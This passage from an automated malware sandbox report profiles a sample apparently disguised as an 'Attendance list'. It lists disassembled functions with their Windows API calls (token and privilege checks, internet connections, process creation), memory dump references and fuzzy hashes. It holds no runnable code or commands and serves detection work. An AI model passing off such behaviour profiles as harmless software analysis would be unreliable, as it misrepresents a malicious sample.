                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: eb43f884f404e2040804fc236cb529909b4cf0d58eaa5863f4d9d1f647ee6b51
                        • Instruction ID: 2c6d7ef19b8e69d354c5a835a7225c9a306d6a9d673709a4b79f28654d68f74b
                        • Opcode Fuzzy Hash: eb43f884f404e2040804fc236cb529909b4cf0d58eaa5863f4d9d1f647ee6b51
                        • Instruction Fuzzy Hash: 7A317C75601018BFCB65CF58C898EFA7BBAEB49310F044169F9058B3A1D7359D50EFA4
                        Function 00918B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00918652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00918669
                          • Part of subcall function 00918652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00918673
                          • Part of subcall function 00918652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00918682
                          • Part of subcall function 00918652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00918689
                          • Part of subcall function 00918652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091869F
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00918BEB
                        • _memcmp.LIBCMT ref: 00918C0E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00918C44
                        • HeapFree.KERNEL32(00000000), ref: 00918C4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: 892d3ee5b74ddcf87581582938edf824262d4fc706bb16ea370372de87eef511
                        • Instruction ID: c9f8dad72a8ce342e3dea4aad19e504417b7d5afdff7d24f3d52ecf4f09e8020
                        • Opcode Fuzzy Hash: 892d3ee5b74ddcf87581582938edf824262d4fc706bb16ea370372de87eef511
                        • Instruction Fuzzy Hash: F6217A71F4120DEFDB10DFA4C949BEEB7B8EF44354F144059E894A7240DB31AA86EBA0
                        Function 008E0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                        Download Yara Rule
                        APIs
                        • __setmode.LIBCMT ref: 008E0BF2
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00927B20,?,?,00000000), ref: 008C5B8C
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00927B20,?,?,00000000,?,?), ref: 008C5BB0
                        • _fprintf.LIBCMT ref: 008E0C29
                        • OutputDebugStringW.KERNEL32(?), ref: 00916331
                          • Part of subcall function 008E4CDA: _flsall.LIBCMT ref: 008E4CF3
                        • __setmode.LIBCMT ref: 008E0C5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                        • String ID:
                        • API String ID: 521402451-0
                        • Opcode ID: 93e6781b2a525ff152f9e6d14f2fc9ad89f77a9712a58f50d9048281e1afec1d
                        • Instruction ID: 0def6ba7d0c50bfa29e54986796fc5c1a639fed51c1471d8606ff605835f7814
                        • Opcode Fuzzy Hash: 93e6781b2a525ff152f9e6d14f2fc9ad89f77a9712a58f50d9048281e1afec1d
                        • Instruction Fuzzy Hash: 531127319042486ACB04B3BAAC46EBE7B69FF82320F24015AF118D72D2DE715DC65792
                        Function 00931A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00931A97
                          • Part of subcall function 00931B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00931B40
                          • Part of subcall function 00931B21: InternetCloseHandle.WININET(00000000), ref: 00931BDD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Internet$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 1463438336-0
                        • Opcode ID: 6f29e0e3936b65bc2ddcbada93a53a24adf9c6af9f6f720a5be630345495c851
                        • Instruction ID: a2852e88713964ddb5ae888e8519d7e7b9dcfb08455bb677c0e54bc7b7c64bfc
                        • Opcode Fuzzy Hash: 6f29e0e3936b65bc2ddcbada93a53a24adf9c6af9f6f720a5be630345495c851
                        • Instruction Fuzzy Hash: 4A21A135204601BFDB159F608C11FBBB7BDFF85701F10452AFA1296660EB75E811AFA0
                        Function 0091E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0091F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0091E1C4,?,?,?,0091EFB7,00000000,000000EF,00000119,?,?), ref: 0091F5BC
                          • Part of subcall function 0091F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0091F5E2
                          • Part of subcall function 0091F5AD: lstrcmpiW.KERNEL32(00000000,?,0091E1C4,?,?,?,0091EFB7,00000000,000000EF,00000119,?,?), ref: 0091F613
                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0091EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0091E1DD
                        • lstrcpyW.KERNEL32(00000000,?), ref: 0091E203
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0091EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0091E237
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        • Opcode ID: 45feb3fec73fd4ccc94e04b2c45b91772b06f0896254cc327c629f9be9660218
                        • Instruction ID: 354038ae949e92c50bbe11f7e35840905dc5a6ba2eab9080bd66358c8ecdb6b4
                        • Opcode Fuzzy Hash: 45feb3fec73fd4ccc94e04b2c45b91772b06f0896254cc327c629f9be9660218
                        • Instruction Fuzzy Hash: 8011D33A204349EFCB25AF64DC55EBA77ADFF8A350B40442AF816CB250EB71D890D790
                        Function 008F5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 008F5351
                          • Part of subcall function 008E594C: __FF_MSGBANNER.LIBCMT ref: 008E5963
                          • Part of subcall function 008E594C: __NMSG_WRITE.LIBCMT ref: 008E596A
                          • Part of subcall function 008E594C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,00000000,?,?,?,008E1013,?), ref: 008E598F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: 1cc7332c8e0e59a78f7234e0af7433b39f5385cf84853dc4424b2a6478f6ace2
                        • Instruction ID: b48fc2842794a1aa997a4e170789462866372b64f086c34785710a5f0136ffbe
                        • Opcode Fuzzy Hash: 1cc7332c8e0e59a78f7234e0af7433b39f5385cf84853dc4424b2a6478f6ace2
                        • Instruction Fuzzy Hash: AE118232508A1EAECB312F7DEC55A6E3798FF133E4B100429FB49D7291DA7189409752
                        Function 008C4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 008C4560
                          • Part of subcall function 008C410D: _memset.LIBCMT ref: 008C418D
                          • Part of subcall function 008C410D: _wcscpy.LIBCMT ref: 008C41E1
                          • Part of subcall function 008C410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008C41F1
                        • KillTimer.USER32(?,00000001,?,?), ref: 008C45B5
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C45C4
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008FD6CE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                        • String ID:
                        • API String ID: 1378193009-0
                        • Opcode ID: 5f6d3c4ae16b1e88f1c6a516534887d085e31a867a06113ea79edf17f5e341cf
                        • Instruction ID: 3fe30e81e4cfc4a21d4d69dd044ad191ff4391bac48e750198864f75c7d5ebbf
                        • Opcode Fuzzy Hash: 5f6d3c4ae16b1e88f1c6a516534887d085e31a867a06113ea79edf17f5e341cf
                        • Instruction Fuzzy Hash: E92186745087889FEB328B349855FE7BBEDEF11308F04009DE79DD6241C7785A859B91
                        Function 0093667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00927B20,?,?,00000000), ref: 008C5B8C
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00927B20,?,?,00000000,?,?), ref: 008C5BB0
                        • gethostbyname.WSOCK32(?,?,?), ref: 009366AC
                        • WSAGetLastError.WSOCK32(00000000), ref: 009366B7
                        • _memmove.LIBCMT ref: 009366E4
                        • inet_ntoa.WSOCK32(?), ref: 009366EF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 1504782959-0
                        • Opcode ID: 65bc9a9b7fdbeeae98cedc2a361ccd176c9217b3dee8eaf7dafa06ae49a67c81
                        • Instruction ID: 03143a9ef201ff7376dc8ed5c055f098cde0fbda41b801b8c2670dba5669f053
                        • Opcode Fuzzy Hash: 65bc9a9b7fdbeeae98cedc2a361ccd176c9217b3dee8eaf7dafa06ae49a67c81
                        • Instruction Fuzzy Hash: 4D111C36500509AFCF04EBA8D996EEEB7B8FF44310B144069F506E7261DF30AE44DB62
                        Function 00919023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00919043
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00919055
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091906B
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00919086
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 646f7cdad13b49067cb2fc978f184d83f02bea37815c4bec408441c0870a0f04
                        • Instruction ID: df5b22ce5f7cb4ab0f69555dc6cd5d3cbd449989a50ff88297e6592d5864c435
                        • Opcode Fuzzy Hash: 646f7cdad13b49067cb2fc978f184d83f02bea37815c4bec408441c0870a0f04
                        • Instruction Fuzzy Hash: 0D114C79A01218FFDB10DFA5C884EDDBB78FB48310F204095EA04B7250D6726E50DB90
                        Function 008C1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DefDlgProcW.USER32(?,00000020,?), ref: 008C12D8
                        • GetClientRect.USER32(?,?), ref: 008FB84B
                        • GetCursorPos.USER32(?), ref: 008FB855
                        • ScreenToClient.USER32(?,?), ref: 008FB860
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Client$CursorLongProcRectScreenWindow
                        • String ID:
                        • API String ID: 4127811313-0
                        • Opcode ID: 07dcd2241797335aa82e18e8a81226c75a7edfc127f077c138ee8577dae1c2a2
                        • Instruction ID: 5e993309cba6e48e6e4e1d672eef6e6b4d8dbaf5f90f163e37aee0e0517858ce
                        • Opcode Fuzzy Hash: 07dcd2241797335aa82e18e8a81226c75a7edfc127f077c138ee8577dae1c2a2
                        • Instruction Fuzzy Hash: 6011163991011AAFDF10EFA8D899EBEB7B8FB06301F000459F911E7252C730EA519BA5
                        Function 00921652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 0092166F
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 00921694
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 0092169E
                        • Sleep.KERNEL32(?,?,?,?,?,?,?,009201FD,?,00921250,?,00008000), ref: 009216D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: 6b5e0b73aa7e6ee808ed2327e2dbea2dee98d1fd94b784eb35328996e2571219
                        • Instruction ID: 6973c1151a2ea2e347843c95737223a0c2c62e14752f566f506d753fe616dafb
                        • Opcode Fuzzy Hash: 6b5e0b73aa7e6ee808ed2327e2dbea2dee98d1fd94b784eb35328996e2571219
                        • Instruction Fuzzy Hash: D4118E31C1852DDBCF00AFA5E848AEEBB78FF1A701F054455E940B2244CB3055A0DBD6
                        Function 008F7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: f107c3ccc4947fe9d738541ba813f29f37f1a81cc8658ef509c5717e7002da94
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: DE01403604418EBBDF125EA8DC018EE3F62FF59355B588515FB1998131D237C9B1AB81
                        Function 0094B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 0094B59E
                        • ScreenToClient.USER32(?,?), ref: 0094B5B6
                        • ScreenToClient.USER32(?,?), ref: 0094B5DA
                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0094B5F5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: 0c556032bda8298c05e600479ca53301396c68547b3aa01f65f49fbf3631bde5
                        • Instruction ID: 1635aacc92afb77f17c39660ecc2d84c003ff1bfcc4b99a9271e6231c60571c7
                        • Opcode Fuzzy Hash: 0c556032bda8298c05e600479ca53301396c68547b3aa01f65f49fbf3631bde5
                        • Instruction Fuzzy Hash: A11134B9D0420EEFDB41CF99D4449EEFBF9FB09310F104166E914E2220D735AA559F50
                        Function 0094B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0094B8FE
                        • _memset.LIBCMT ref: 0094B90D
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00987F20,00987F64), ref: 0094B93C
                        • CloseHandle.KERNEL32 ref: 0094B94E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memset$CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3277943733-0
                        • Opcode ID: 5cdcd4b95e7687c51c4af8f785591cb4a85ff328b573b9f1258c4132792944bf
                        • Instruction ID: 516d78290dc39500e44a37cce47687aa99915b7c852e467ccc68e6de2b8996db
                        • Opcode Fuzzy Hash: 5cdcd4b95e7687c51c4af8f785591cb4a85ff328b573b9f1258c4132792944bf
                        • Instruction Fuzzy Hash: B4F089B25683107BF2102BA7AC05F7BBA9CEB09754F100060BB08D6392D771CD0097A9
                        Function 00926E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                        Download Yara Rule
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 00926E88
                          • Part of subcall function 0092794E: _memset.LIBCMT ref: 00927983
                        • _memmove.LIBCMT ref: 00926EAB
                        • _memset.LIBCMT ref: 00926EB8
                        • LeaveCriticalSection.KERNEL32(?), ref: 00926EC8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CriticalSection_memset$EnterLeave_memmove
                        • String ID:
                        • API String ID: 48991266-0
                        • Opcode ID: e7fbb22757b7e006d7e32727cd5be8b46142e1b222ecd25a6dbb96f35a54234c
                        • Instruction ID: b64cb315221ed66fadc265113dfcd6c5181faf37e42532cc5849937d282f781a
                        • Opcode Fuzzy Hash: e7fbb22757b7e006d7e32727cd5be8b46142e1b222ecd25a6dbb96f35a54234c
                        • Instruction Fuzzy Hash: 27F0543E104610ABCF016F55EC85F4ABB29EF46320B048061FE089F21BC771A951DBB5
                        Function 0094C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008C134D
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C135C
                          • Part of subcall function 008C12F3: BeginPath.GDI32(?), ref: 008C1373
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C139C
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094C030
                        • LineTo.GDI32(00000000,?,?), ref: 0094C03D
                        • EndPath.GDI32(00000000), ref: 0094C04D
                        • StrokePath.GDI32(00000000), ref: 0094C05B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        • Opcode ID: e9b5a71b892bf0c5d9c1ade40899f3cd0abb15ea7ebdd909eef411d1380c601d
